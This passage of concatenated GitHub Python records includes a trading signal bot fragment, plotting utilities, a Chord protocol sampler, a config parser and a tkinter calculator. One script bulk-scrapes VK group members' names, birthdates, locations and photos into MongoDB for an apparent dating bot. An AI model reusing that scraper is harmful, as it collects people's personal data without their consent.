db=0)\n context = zmq.Context()\n socket = context.socket(zmq.PUB)\n socket.bind('tcp://*:6666')\n target_infos = await load_targets_config('./csv/35000.csv') # 需要盯的名单设置在此处\n temp_moments = []\n while True:\n try:\n # 循环获取最近上新 和缓存对比\n # TODO default换成默认查询,否则太慢抢不到\n new_moments = await get_new_list_default()\n moments_will_search = []\n\n if len(temp_moments) == 0:\n moments_will_search = new_moments\n else:\n old_ids = list(map(lambda m: m['id'], temp_moments))\n new_ids = list(map(lambda m: m['id'], new_moments))\n last = old_ids[-1]\n if last in new_ids:\n moments_will_search = new_moments[new_ids.index(last)+1:]\n else:\n moments_will_search = new_moments\n\n if len(moments_will_search) == 0:\n logger.debug(\"没有新上架的瞬间\")\n else:\n search_play_ids = list(\n map(lambda i: i['play']['id'], moments_will_search))\n logger.debug(f\"过滤查询的moment数量为: {len(moments_will_search)}\")\n temp_moments = new_moments\n filter_target_infos = list(\n filter(lambda s: s[1] in search_play_ids, target_infos))\n if len(filter_target_infos) != 0:\n logger.info(\n f\"过滤查询在表格中的moment数量为: {len(filter_target_infos)}\")\n for buy_number_list in await asyncio.gather(*[process(target_info[0], target_info[1], target_info[2], target_info[3], socket, redis_client) for target_info in filter_target_infos]):\n logger.debug(f\"Buy list is {buy_number_list}\")\n else:\n logger.debug(\"最新上架没有表格中的\")\n except Exception as e:\n logger.warning(f\"send_buy_signal错误:{e}\")\n finally:\n time.sleep(random.uniform(5, 7))\n\nasyncio.run(main())\n","repo_name":"script-money/ts-helper","sub_path":"send_buy_signal.py","file_name":"send_buy_signal.py","file_ext":"py","file_size_in_byte":4995,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"31477253420","text":"import unittest\nfrom taskbay.app.base import TaskBay\n\n\nclass TestTaskBayApp(unittest.TestCase):\n\n def test_app_config(self):\n \"\"\"hello world\"\"\"\n app = 
TaskBay(config_source='tests.unit.app.taskbay_config')\n self.assertEqual(app.task_cls, 'taskbay.task.base:_Task')\n\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"nanfang/taskbay","sub_path":"tests/unit/app/test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28788082026","text":"import vkapi\nimport os\nimport vk\nfrom mongoengine import *\nfrom pymongo import MongoClient\nfrom settings import *\nfrom datetime import date\nimport math\n\nconnect(\"chat\", host=\"mongodb://127.0.0.1\")\n\nclass User(Document):\n user_id = IntField(required=True, unique=True)\n first_name = StringField(required=True)\n last_name = StringField(required=True)\n gender = IntField()\n stage = IntField()\n bdate = StringField()\n age = IntField()\n photo_max_orig = StringField()\n city_id = IntField()\n city_name = StringField()\n country_id = IntField()\n country_name = StringField()\n choice_gender = IntField()\n choice_age = IntField()\n photo_id = StringField()\n\nsession = vk.Session()\napi = vk.API(session, v=5.63, lang=\"ru\")\ndef calculate_age(day, month, year):\n today = date.today()\n return today.year - year - ((today.month, today.day) < (month, day))\n\ngroup_id = main_group_id\ndef getMembersBulk(group_id):\n first_check = api.groups.getMembers(group_id = group_id, count=1)\n maximum = first_check[\"count\"]\n amount = 500\n amou = math.ceil(maximum/amount)\n for c in range(0, amou):\n users = api.groups.getMembers(group_id = group_id, count=amount, offset = c*amount, \n fields = \"sex,bdate,city,country,photo_max_orig,photo_id,has_photo\")\n #print(users)\n for i in users[\"items\"]:\n if not i.get(\"deactivated\"):\n if i.get(\"has_photo\") == 1:\n print(i)\n user = User(user_id=i[\"id\"], first_name=i[\"first_name\"], last_name=i[\"last_name\"],\n gender=i.get(\"sex\"), bdate=i.get(\"bdate\"), photo_max_orig=i.get(\"photo_max_orig\"), city_id=i.get(\"city\", {}).get(\"id\"),\n city_name=i.get(\"city\", {}).get(\"title\"), country_id=i.get(\"country\", {}).get(\"id\"),\n country_name=i.get(\"country\", {}).get(\"title\"), photo_id = i.get(\"photo_id\"),stage=0)\n if user[\"bdate\"]:\n bdate = user[\"bdate\"]\n bdate = bdate.split(\".\")\n if len(bdate) == 3:\n # we have age\n day = int(bdate[0])\n month = int(bdate[1])\n year = int(bdate[2])\n age = calculate_age(day, month, year)\n \n user.age = age\n try:\n user.save()\n print(\"added {}\".format(i[\"id\"]))\n except Exception:\n pass\n\n\n\n\n\ngetMembersBulk(group_id)\n\n\n#user = api.users.get(user_ids=data[\"user_id\"], fields='sex,bdate,city,country,photo_max_orig')[0]","repo_name":"Ax3Effect/datingbot","sub_path":"getGroupMembers.py","file_name":"getGroupMembers.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"20802803577","text":"import csv\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\nimport numpy as np\nimport math\nimport os\nimport scipy.signal\nimport sys\nimport getopt\nimport pickle\nfrom constants import *\nimport imageio\n\ndef plotHeatmaps(frames, out_name, plot_range = None):\n os.makedirs(out_name, exist_ok=True)\n if plot_range is None:\n plot_range = len(frames)\n out_drawing = frames[:,:,:]\n max_val = np.amax(frames[:,:,:])\n out_drawing[np.where(frames == 
-10000)] = 0;\n max_val = np.nanmax(frames)\n for i in range(plot_range):\n plt.imshow(out_drawing[i], vmax=max_val, vmin = 0)\n plt.colorbar()\n plt.savefig(out_name +'/' + str(i).zfill(4) + '.png', bbox_inches='tight')\n plt.close()\n\ndef plotGif(frames, out_folder, out_name, title = None, highlights = None, polygons = [], plot_range = None, fps = 10, frequency=1):\n os.makedirs(out_folder, exist_ok=True)\n if plot_range is None:\n plot_range = len(frames)\n out_drawing = np.copy(frames)\n max_val = np.amax(frames[:,:,:])\n out_drawing[np.where(frames == -10000)] = 0\n max_val = np.nanmax(frames)\n images = []\n filenames = []\n for i in range(0,plot_range,frequency):\n fig, ax = plt.subplots()\n plt.axis('off')\n im = ax.imshow(out_drawing[i], vmax=max_val, vmin = 0)\n if highlights is not None: \n for hl in highlights[i]:\n circle = plt.Circle((hl['col'], hl['row']), 1, color=hl['color'])\n #ax.text(hl['col'],hl['row'],'.', ha=\"center\", va=\"center\", color=hl['color'], fontsize=64)\n ax.add_artist(circle)\n for poly in polygons:\n cur_poly = plt.Polygon(poly, fill=False, edgecolor='r')\n ax.add_patch(cur_poly)\n cbar = fig.colorbar(im)\n cbar.set_label(\"Pressure (psi)\")\n if title is not None:\n plt.title(title)\n plt.tight_layout()\n canvas = FigureCanvas(fig)\n canvas.draw()\n width, height = fig.get_size_inches() * fig.get_dpi()\n image = np.fromstring(canvas.tostring_rgb(), dtype='uint8').reshape(int(height), int(width), 3)\n images.append(image)\n plt.close()\n imageio.mimsave(out_folder + '/' + out_name +'.gif', images, fps=10)\n\ndef plotGestureHistos(touches_data, out_dir):\n os.makedirs(out_dir, exist_ok=True)\n gesture_counts = {}\n for touch in touches_data:\n if touch[\"emotion\"] not in gesture_counts.keys():\n gesture_counts[touch[\"emotion\"]] = {}\n if touch[\"gesture\"] not in gesture_counts[touch[\"emotion\"]].keys():\n gesture_counts[touch[\"emotion\"]][touch[\"gesture\"]] = 0\n gesture_counts[touch[\"emotion\"]][touch[\"gesture\"]] += 1\n for emotion in gesture_counts.keys():\n cur_dict = gesture_counts[emotion]\n plt.bar(range(len(cur_dict)), cur_dict.values(), align='center')\n plt.xticks(range(len(cur_dict)), cur_dict.keys())\n plt.title(emotion)\n plt.savefig(out_dir +'/' + emotion + '.png')\n plt.close()\n\ndef multiPlotHeatmaps(frames_array, out_name):\n num_plots = len(frames_array)\n os.makedirs(out_name, exist_ok=True)\n plt.figure(1)\n for i in range(len(frames_array[0])):\n for j in range(num_plots):\n plt.subplot(num_plots, 1, j+1)\n frames = frames_array[j]\n out_drawing = frames[:,:,:]\n max_val = np.amax(frames[:,:,:])\n out_drawing[np.where(frames == -10000)] = 0;\n max_val = np.nanmax(frames)\n plt.imshow(out_drawing[i], vmax=max_val)\n plt.colorbar()\n plt.savefig(out_name +'/' + str(i).zfill(4) + '.png', bbox_inches='tight')\n plt.close()\n","repo_name":"charm-lab/social_multiobject_tracking","sub_path":"general_plotting.py","file_name":"general_plotting.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14099525327","text":"class Solution(object):\n def searchMatrix(self, matrix, target):\n \"\"\"\n :type matrix: List[List[int]]\n :type target: int\n :rtype: bool\n \"\"\"\n r = len(matrix)\n if r == 0:\n return False\n c= len(matrix[0])\n \n start = 0\n end = r*c-1\n #We flatten the matrix\n #[1,2,5,7|10,11,16,20|23,30,34,60]\n # Find the middle. 
To find column middle // #colums\n #To fidn row middle % columns\n while start <= end:\n pivot = (start + end) //2\n curr_element = matrix[pivot//c][pivot%c]\n if target == curr_element:\n return True\n elif target < curr_element:\n end = pivot -1\n elif target > curr_element:\n start = pivot + 1\n return False\n \n ","repo_name":"saviaga/CodingProblems","sub_path":"74-search-a-2d-matrix/74-search-a-2d-matrix.py","file_name":"74-search-a-2d-matrix.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20758154954","text":"import numpy as np\nfrom collections import defaultdict\nfrom scipy.special import comb\nimport time\nimport pandas as pd\nfrom itertools import product, permutations\n\nrng = np.random.default_rng(0)\n\ndef join_prec(x, y):\n\tif not ((not a[x])):\n\t\treturn False\n\tif not ((a[y])):\n\t\treturn False\n\tif not ((not btw[x, org, y])):\n\t\treturn False\n\treturn True\n\ndef join(x, y):\n\ta[x] = True\n\tfor Y in range(node_num):\n\t\ts1[x, Y] = y == Y\n\tin_s1[x] = True\n\tfor Y in range(node_num):\n\t\ts2[x, Y] = False\n\tin_s2[x] = False\n\tfor Y in range(node_num):\n\t\tp[x, Y] = False\n\ndef stabilize_prec(x, y, z):\n\tif not ((a[x])):\n\t\treturn False\n\tif not ((s1[x, y])):\n\t\treturn False\n\tif not ((a[y])):\n\t\treturn False\n\tif not ((p[y, z])):\n\t\treturn False\n\tif not ((btw[x, z, y])):\n\t\treturn False\n\treturn True\n\ndef stabilize(x, y, z):\n\tfor Z in range(node_num):\n\t\ts1[x, Z] = Z == z\n\tin_s1[x] = True\n\tfor Y in range(node_num):\n\t\ts2[x, Y] = Y == y\n\tin_s2[x] = True\n\ndef notify_prec(x, y, z):\n\tif not ((a[x])):\n\t\treturn False\n\tif not ((s1[x, y])):\n\t\treturn False\n\tif not ((a[y])):\n\t\treturn False\n\ttmp_var_1 = True\n\tfor X in range(node_num):\n\t\tif not (p[y, z] or not p[y, X]):\n\t\t\ttmp_var_1 = False\n\t\t\tbreak\n\tif not (tmp_var_1):\n\t\treturn False\n\tif not ((btw[z, x, y])):\n\t\treturn False\n\treturn True\n\ndef notify(x, y, z):\n\tfor X in range(node_num):\n\t\tp[y, X] = X == x\n\ndef inherit_prec(x, y, z):\n\tif not ((a[x])):\n\t\treturn False\n\tif not ((s1[x, y])):\n\t\treturn False\n\tif not ((a[y])):\n\t\treturn False\n\tif not ((s1[y, z])):\n\t\treturn False\n\treturn True\n\ndef inherit(x, y, z):\n\tfor Z in range(node_num):\n\t\ts2[x, Z] = Z == z\n\tin_s2[x] = True\n\ndef remove_prec(x, y, z):\n\tif not ((a[x])):\n\t\treturn False\n\tif not ((s1[x, y])):\n\t\treturn False\n\tif not ((not a[y])):\n\t\treturn False\n\tif not ((s2[x, z])):\n\t\treturn False\n\treturn True\n\ndef remove(x, y, z):\n\tfor Z in range(node_num):\n\t\ts1[x, Z] = Z == z\n\tin_s1[x] = True\n\tfor Y in range(node_num):\n\t\ts2[x, Y] = False\n\tin_s2[x] = False\n\ndef fail_prec(x):\n\tif not ((a[x])):\n\t\treturn False\n\tif not ((x != org)):\n\t\treturn False\n\ttmp_var_2 = True\n\tfor Y in range(node_num):\n\t\tif not (not ((s1[Y, x])) or (in_s2[Y])):\n\t\t\ttmp_var_2 = False\n\t\t\tbreak\n\tif not (tmp_var_2):\n\t\treturn False\n\ttmp_var_3 = True\n\tfor Z in range(node_num):\n\t\tfor Y in range(node_num):\n\t\t\tif not (not ((s1[Y, x] and s2[Y, Z])) or (a[Z])):\n\t\t\t\ttmp_var_3 = False\n\t\t\t\tbreak\n\tif not (tmp_var_3):\n\t\treturn False\n\ttmp_var_4 = True\n\tfor Y in range(node_num):\n\t\tfor X in range(node_num):\n\t\t\tif not (not ((s1[X, Y] and s2[X, x])) or ((Y != x and a[Y]))):\n\t\t\t\ttmp_var_4 = False\n\t\t\t\tbreak\n\tif not (tmp_var_4):\n\t\treturn False\n\treturn True\n\ndef fail(x):\n\ta[x] = False\n\tfor Y 
in range(node_num):\n\t\tp[x, Y] = False\n\tfor Y in range(node_num):\n\t\ts1[x, Y] = False\n\tin_s1[x] = False\n\tfor Y in range(node_num):\n\t\ts2[x, Y] = False\n\tin_s2[x] = False\n\ndef reach_org_prec(x, y, z):\n\tif not (((s1[x, y] and a[y] and reach[y]) or (s1[x, y] and not a[y] and s2[x, z] and a[z] and reach[z]))):\n\t\treturn False\n\treturn True\n\ndef reach_org(x, y, z):\n\treach[x] = True\n\ndef remove_org_prec(x, y, z):\n\tif not ((x != org)):\n\t\treturn False\n\tif not ((s1[x, y])):\n\t\treturn False\n\tif not ((not a[y] or not reach[y])):\n\t\treturn False\n\ttmp_var_5 = True\n\tfor Z in range(node_num):\n\t\tif not (not (not a[y]) or ((not s2[x, Z] or s2[x, z]))):\n\t\t\ttmp_var_5 = False\n\t\t\tbreak\n\tif not (tmp_var_5):\n\t\treturn False\n\tif not ((not ((not a[y] and s2[x, z])) or ((not a[z] or not reach[z])))):\n\t\treturn False\n\treturn True\n\ndef remove_org(x, y, z):\n\treach[x] = False\n\nfunc_from_name = {'join': join, 'join_prec': join_prec, 'stabilize': stabilize, 'stabilize_prec': stabilize_prec, 'notify': notify, 'notify_prec': notify_prec, 'inherit': inherit, 'inherit_prec': inherit_prec, 'remove': remove, 'remove_prec': remove_prec, 'fail': fail, 'fail_prec': fail_prec, 'reach_org': reach_org, 'reach_org_prec': reach_org_prec, 'remove_org': remove_org, 'remove_org_prec': remove_org_prec}\n\ndef instance_generator():\n\tnode_num = rng.integers(3, 7)\n\treturn node_num\n\ndef sample(max_iter=50):\n\tglobal node_num, a, s1, in_s1, s2, in_s2, p, reach, error, org, other, btw\n\tdf_data = set()\n\tstopping_criteria = False\n\tsimulation_round = 0\n\tdf_size_history = [0]\n\twhile stopping_criteria is False:\n\t\t# protocol initialization\n\t\tnode_num = instance_generator()\n\t\ta = rng.integers(0, 2, size=(node_num), dtype=bool)\n\t\ts1 = rng.integers(0, 2, size=(node_num, node_num), dtype=bool)\n\t\tin_s1 = rng.integers(0, 2, size=(node_num), dtype=bool)\n\t\ts2 = rng.integers(0, 2, size=(node_num, node_num), dtype=bool)\n\t\tin_s2 = rng.integers(0, 2, size=(node_num), dtype=bool)\n\t\tp = rng.integers(0, 2, size=(node_num, node_num), dtype=bool)\n\t\treach = rng.integers(0, 2, size=(node_num), dtype=bool)\n\t\terror = rng.integers(0, 2, size=(node_num), dtype=bool)\n\t\torg = rng.integers(0, node_num)\n\t\tother = rng.integers(0, node_num)\n\t\t# build ring topology\n\t\tbtw = np.zeros((node_num, node_num, node_num), dtype=bool)\n\t\tfor x in range(node_num):\n\t\t\tfor y in range(node_num):\n\t\t\t\tfor z in range(node_num):\n\t\t\t\t\tif x != y and x != z and y != z:\n\t\t\t\t\t\tbtw[x, y, z] = (x < y < z) | (z < x < y) | (y < z < x)\n\t\tother, org = rng.choice(node_num, 2, replace=False)\n\t\t\n\t\tfor X in range(node_num):\n\t\t\ta[X] = X == org or X == other\n\t\tfor X in range(node_num):\n\t\t\tfor Y in range(node_num):\n\t\t\t\ts1[X, Y] = (X == org and Y == other) or (X == other and Y == org)\n\t\tfor X in range(node_num):\n\t\t\tin_s1[X] = X == org or X == other\n\t\tfor X in range(node_num):\n\t\t\tfor Y in range(node_num):\n\t\t\t\ts2[X, Y] = False\n\t\tfor X in range(node_num):\n\t\t\tin_s2[X] = False\n\t\tfor X in range(node_num):\n\t\t\tfor Y in range(node_num):\n\t\t\t\tp[X, Y] = (X == org and Y == other) or (X == other and Y == org)\n\t\tfor X in range(node_num):\n\t\t\treach[X] = X == org\n\t\tfor X in range(node_num):\n\t\t\terror[X] = False\n\n\t\taction_pool = ['join', 'stabilize', 'notify', 'inherit', 'remove', 'fail', 'reach_org', 'remove_org']\n\t\targument_pool = dict()\n\t\targument_pool['join'] = []\n\t\tfor x in 
range(node_num):\n\t\t\tfor y in range(node_num):\n\t\t\t\targument_pool['join'].append((x, y))\n\t\targument_pool['stabilize'] = []\n\t\tfor x in range(node_num):\n\t\t\tfor y in range(node_num):\n\t\t\t\tfor z in range(node_num):\n\t\t\t\t\targument_pool['stabilize'].append((x, y, z))\n\t\targument_pool['notify'] = []\n\t\tfor x in range(node_num):\n\t\t\tfor y in range(node_num):\n\t\t\t\tfor z in range(node_num):\n\t\t\t\t\targument_pool['notify'].append((x, y, z))\n\t\targument_pool['inherit'] = []\n\t\tfor x in range(node_num):\n\t\t\tfor y in range(node_num):\n\t\t\t\tfor z in range(node_num):\n\t\t\t\t\targument_pool['inherit'].append((x, y, z))\n\t\targument_pool['remove'] = []\n\t\tfor x in range(node_num):\n\t\t\tfor y in range(node_num):\n\t\t\t\tfor z in range(node_num):\n\t\t\t\t\targument_pool['remove'].append((x, y, z))\n\t\targument_pool['fail'] = []\n\t\tfor x in range(node_num):\n\t\t\targument_pool['fail'].append((x,))\n\t\targument_pool['reach_org'] = []\n\t\tfor x in range(node_num):\n\t\t\tfor y in range(node_num):\n\t\t\t\tfor z in range(node_num):\n\t\t\t\t\targument_pool['reach_org'].append((x, y, z))\n\t\targument_pool['remove_org'] = []\n\t\tfor x in range(node_num):\n\t\t\tfor y in range(node_num):\n\t\t\t\tfor z in range(node_num):\n\t\t\t\t\targument_pool['remove_org'].append((x, y, z))\n\n\t\tfor curr_iter in range(max_iter):\n\t\t\trng.shuffle(action_pool)\n\t\t\taction_selected, args_selected = None, None\n\t\t\tfor action in action_pool:\n\t\t\t\trng.shuffle(argument_pool[action])\n\t\t\t\targument_candidates = argument_pool[action]\n\t\t\t\tfor args_candidate in argument_candidates:\n\t\t\t\t\tif func_from_name[action + '_prec'](*args_candidate):\n\t\t\t\t\t\taction_selected, args_selected = action, args_candidate\n\t\t\t\t\t\tbreak\n\t\t\t\tif action_selected is not None:\n\t\t\t\t\tbreak\n\t\t\tif action_selected is None:\n\t\t\t\t# action pool exhausted, start a new simulation\n\t\t\t\tbreak\n\t\t\tfunc_from_name[action_selected](*args_selected)\n\n\t\t\t# generate subsamples from the current state (sample)\n\t\t\tfor k in range(3):\n\t\t\t\tnode_indices = rng.choice(list(range(node_num)), 3, replace=False)\n\t\t\t\tnode_indices = sorted(node_indices)\n\t\t\t\tfor N1, N2, N3, in permutations(node_indices):\n\t\t\t\t\tdf_data.add((a[N1], a[N2], a[N3], s1[N1,N1], s1[N1,N2], s1[N1,N3], s1[N2,N1], s1[N2,N2], s1[N2,N3], s1[N3,N1], s1[N3,N2], s1[N3,N3], in_s1[N1], in_s1[N2], in_s1[N3], s2[N1,N1], s2[N1,N2], s2[N1,N3], s2[N2,N1], s2[N2,N2], s2[N2,N3], s2[N3,N1], s2[N3,N2], s2[N3,N3], in_s2[N1], in_s2[N2], in_s2[N3], reach[N1], reach[N2], reach[N3], btw[N1,N2,N3], org==N1, org==N2, org==N3, other==N1, other==N2, other==N3))\n\t\tsimulation_round += 1\n\t\tdf_size_history.append(len(df_data))\n\t\tstopping_criteria = simulation_round > 1000 or (simulation_round > 20 and df_size_history[-1] == df_size_history[-21])\n\treturn list(df_data)\n\nif __name__ == '__main__':\n\tstart_time = time.time()\n\tdf_data = sample()\n\tdf = pd.DataFrame(df_data, columns=['a(N1)', 'a(N2)', 'a(N3)', 's1(N1,N1)', 's1(N1,N2)', 's1(N1,N3)', 's1(N2,N1)', 's1(N2,N2)', 's1(N2,N3)', 's1(N3,N1)', 's1(N3,N2)', 's1(N3,N3)', 'in_s1(N1)', 'in_s1(N2)', 'in_s1(N3)', 's2(N1,N1)', 's2(N1,N2)', 's2(N1,N3)', 's2(N2,N1)', 's2(N2,N2)', 's2(N2,N3)', 's2(N3,N1)', 's2(N3,N2)', 's2(N3,N3)', 'in_s2(N1)', 'in_s2(N2)', 'in_s2(N3)', 'reach(N1)', 'reach(N2)', 'reach(N3)', 'ring.btw(N1,N2,N3)', 'org=N1', 'org=N2', 'org=N3', 'other=N1', 'other=N2', 'other=N3'])\n\tdf = 
df.drop_duplicates().astype(int)\n\tend_time = time.time()\n\tdf.to_csv('../traces/chord.csv', index=False)\n\tprint('Simulation finished. Trace written to traces/chord.csv')\n","repo_name":"VeriGu/DistAI","sub_path":"auto_samplers/chord.py","file_name":"chord.py","file_ext":"py","file_size_in_byte":9303,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"27"} +{"seq_id":"6378837970","text":"from .API import RouteMethodView\nfrom .CRUD import CRUD\nfrom .db import db\n\n\nclass Characteristic(db.Model):\n __tablename__ = 'characteristic'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.Text, nullable=False)\n icon = db.Column(db.String(255))\n\n\nclass CharacteristicView(CRUD, RouteMethodView):\n route = Characteristic.__tablename__\n\n def __init__(self):\n super().__init__(Characteristic)\n","repo_name":"EthanITA/my-maitre","sub_path":"be/routes/Characteristic.py","file_name":"Characteristic.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"525954794","text":"\"\"\"\nNSSwitchConf - file ``/etc/nsswitch.conf``\n==========================================\n\n\"\"\"\n\nfrom insights import LegacyItemAccess, Parser, parser\nfrom insights.parsers import get_active_lines\nfrom insights.specs import Specs\n\n\n@parser(Specs.nsswitch_conf)\nclass NSSwitchConf(Parser, LegacyItemAccess):\n \"\"\"\n Read the contents of the ``/etc/nsswitch.conf`` file.\n\n Each non-commented line is split into the service and its sources. The\n sources (e.g. 'files sss') are stored as is, as a string.\n\n nsswitch.conf is case insensitive. This means that both the service and\n its sources are converted to lower case and searches should be done\n using lower case text.\n\n Attributes:\n data (dict): The service dictionary\n errors (list): Non-blank lines which don't contain a ':'\n sources (set): An unordered set of the sources seen in this file\n\n Sample content::\n\n # Example:\n #passwd: db files nisplus nis\n #shadow: db files nisplus nis\n #group: db files nisplus nis\n\n passwd: files sss\n shadow: files sss\n group: files sss\n #initgroups: files\n\n #hosts: db files nisplus nis dns\n hosts: files dns myhostname\n\n Examples:\n\n >>> nss = shared[NSSwitchConf]\n >>> 'passwd' in nss\n True\n >>> 'initgroups' in nss\n False\n >>> nss['passwd']\n 'files nss'\n >>> 'files' in nss['hosts']\n True\n >>> nss.errors\n []\n >>> nss.sources\n set(['files', 'dns', 'sss', 'myhostname'])\n\n \"\"\"\n def parse_content(self, content):\n self.errors = []\n self.data = {}\n self.sources = set()\n for line in get_active_lines(content):\n if ':' not in line:\n self.errors.append(line)\n else:\n service, sources = [s.lower().strip() for s in line.split(':', 1)]\n self.data[service] = sources\n self.sources.update(set(sources.split(None)))\n","repo_name":"RedHatInsights/insights-core","sub_path":"insights/parsers/nsswitch_conf.py","file_name":"nsswitch_conf.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":136,"dataset":"github-code","pt":"27"} +{"seq_id":"24956927640","text":"\"\"\"\n计算器项目\n布局使用Place,利用容器来装相应的组件,具有菜单项顶级菜单\n相关函数\n数字的操作函数\n字符的操作函数\n相关运算的操作函数\n\"\"\"\nfrom tkinter import *\nfrom tkinter import messagebox\nimport operator\n\n\nclass Calculator(Frame):\n def __init__(self, master=None):\n super().__init__(master)\n self.master = master\n self.master.title(\"小破孩蘑菇头计算器\")\n 
self.master.geometry(\"300x315+500+200\")\n self.master.resizable(0, 0) # 边框不允许调整\n self.rst1 = StringVar() # 计算器过程显示对象\n self.rst1.set(\"0\")\n self.rst2 = StringVar() # 计算器结果显示框对象\n self.rst2.set(\"\")\n self.lists = []\n self.menu_tools()\n self.master.bind(\"\", self.show_info)\n self.create_widget()\n self.mainloop()\n\n def create_widget(self):\n # 先创建计算过程和结算结果的容器\n label_frame = Frame(self.master, width=300, height=60, bg=\"pink\")\n label_frame.place(x=0, y=0)\n label02 = Label(label_frame, textvariable=self.rst2, width=300, height=30, bg=\"orange\",font=(\"黑体\",15,\"bold\"), justify=LEFT, anchor=\"e\")\n label02.place(relx=0,rely=0,width=300,height=30)\n label01 = Label(label_frame,textvariable=self.rst1, width=300, height=30, bg=\"pink\", font=(\"黑体\",20,\"bold\"), justify=LEFT, anchor=\"e\")\n label01.place(relx=0, rely=0.5, width=300, height=30)\n button_frame = Frame(self.master, width=300, height=340, bg=\"#0ceecc\")\n button_frame.place(x=0, y=60)\n btn_AC = Button(button_frame, text=\"AC\",command=self.clear)\n btn_AC.place(x=10,y=10,width=60, height=40)\n btn_Sqrt = Button(button_frame, text=\"Sqrt\", command=self.sqrt)\n btn_Sqrt.place(x=85, y=10, width=60, height=40)\n btn_Power = Button(button_frame, text=\"Power\", command=self.power)\n btn_Power.place(x=155, y=10, width=60, height=40)\n btn_back = Button(button_frame, text=\"←\",command=self.rollback)\n btn_back.place(x=225,y=10,width=60,height=40)\n num_btn = Button(button_frame, text=\"7\", command=lambda:self.press_num(\"7\"))\n num_btn.place(x=10, y=60, width=60, height=40)\n num_btn = Button(button_frame, text=\"8\", command=lambda:self.press_num(\"8\"))\n num_btn.place(x=85, y=60, width=60, height=40)\n num_btn = Button(button_frame, text=\"9\", command=lambda:self.press_num(\"9\"))\n num_btn.place(x=155, y=60, width=60, height=40)\n num_btn = Button(button_frame, text=\"÷\", command=lambda:self.operation(\"/\"))\n num_btn.place(x=225, y=60, width=60, height=40)\n num_btn = Button(button_frame, text=\"4\", command=lambda:self.press_num(\"4\"))\n num_btn.place(x=10, y=110, width=60, height=40)\n num_btn = Button(button_frame, text=\"5\", command=lambda:self.press_num(\"5\"))\n num_btn.place(x=85, y=110, width=60, height=40)\n num_btn = Button(button_frame, text=\"6\", command=lambda:self.press_num(\"6\"))\n num_btn.place(x=155, y=110, width=60, height=40)\n num_btn = Button(button_frame, text=\"x\", command=lambda:self.operation(\"*\"))\n num_btn.place(x=225, y=110, width=60, height=40)\n num_btn = Button(button_frame, text=\"1\", command=lambda:self.press_num(\"1\"))\n num_btn.place(x=10, y=160, width=60, height=40)\n num_btn = Button(button_frame, text=\"2\", command=lambda:self.press_num(\"2\"))\n num_btn.place(x=85, y=160, width=60, height=40)\n num_btn = Button(button_frame, text=\"3\", command=lambda:self.press_num(\"3\"))\n num_btn.place(x=155, y=160, width=60, height=40)\n num_btn = Button(button_frame, text=\"-\", command=lambda:self.operation(\"-\"))\n num_btn.place(x=225, y=160, width=60, height=40)\n num_btn = Button(button_frame, text=\"0\", command=lambda:self.press_num(\"0\"))\n num_btn.place(x=10, y=210, width=60, height=40)\n num_btn = Button(button_frame, text=\".\", command=lambda:self.press_num(\".\"))\n num_btn.place(x=85, y=210, width=60, height=40)\n num_btn = Button(button_frame, text=\"=\", command=lambda:self.cal_result(\"=\"))\n num_btn.place(x=155, y=210, width=60, height=40)\n num_btn = Button(button_frame, text=\"+\", command=lambda:self.operation(\"+\"))\n num_btn.place(x=225, 
y=210, width=60, height=40)\n\n def clear(self):\n self.lists.clear()\n self.rst1.set(\"0\")\n self.rst2.set(\"\")\n\n def sqrt(self):\n if len(self.lists) != 0:\n if self.lists[-1] in [\"+\", \"-\", \"*\", \"/\"]:\n del self.lists[-1]\n else:\n com_str = \"\".join(self.lists)\n end_rst = eval(com_str)\n end_rst = end_rst ** 0.5\n self.rst1.set(\"√(\" + com_str + \")\")\n self.rst2.set(end_rst)\n self.lists.clear()\n self.lists.append(str(end_rst))\n\n def power(self):\n if len(self.lists) == 0:\n self.rst2.set(\"0的平方还是0\")\n self.rst1.set(\"0\")\n else:\n if self.lists[-1] in [\"+\", \"-\", \"*\", \"/\"]:\n del self.lists[-1]\n else:\n new_str = \"\".join(self.lists)\n end_num = eval(new_str)\n end_num = end_num * end_num\n self.rst2.set(end_num)\n self.rst1.set(\"(\" + new_str + \")^2\")\n self.lists.clear()\n self.lists.append(str(end_num)) # 这里必须转换成字符型才能拼接相加,数据类型不同的不允许拼接\n\n def operation(self, op):\n if len(self.lists) > 0:\n if self.lists[-1] in [\"+\", \"-\", \"*\", \"/\"]:\n self.lists[-1] = op # 以上代码表示可以随时更换加减乘除\n else:\n self.lists.append(op)\n self.rst1.set(\"\".join(self.lists))\n else:\n self.rst2.set(\"没有可加的对象!\")\n\n def cal_result(self, op1):\n if op1 == \"=\":\n if len(self.lists) > 0:\n if operator.eq(self.lists, ['1','+']):\n self.lists.clear()\n self.rst2.set(\"机会来了,猪都可以上天!\")\n self.rst1.set(\"0\")\n else:\n if self.lists[-1] in [\"+\", \"-\", \"x\", \"/\"]:\n del self.lists[-1]\n else:\n new_str = \"\".join(self.lists) # 这里转换成字符串是为了后面的过程框接收字符串用的\n end_rst = eval(new_str)\n self.rst2.set(end_rst)\n self.rst1.set(new_str)\n self.lists.clear()\n self.lists.append(str(end_rst)) # 供下次继续计算,这里必须要做一个转换,将数值型转换成字符串\n\n def press_num(self, num):\n self.lists.append(num)\n self.rst1.set(\"\".join(self.lists))\n\n def rollback(self):\n if len(self.lists) > 0:\n del self.lists[-1]\n if 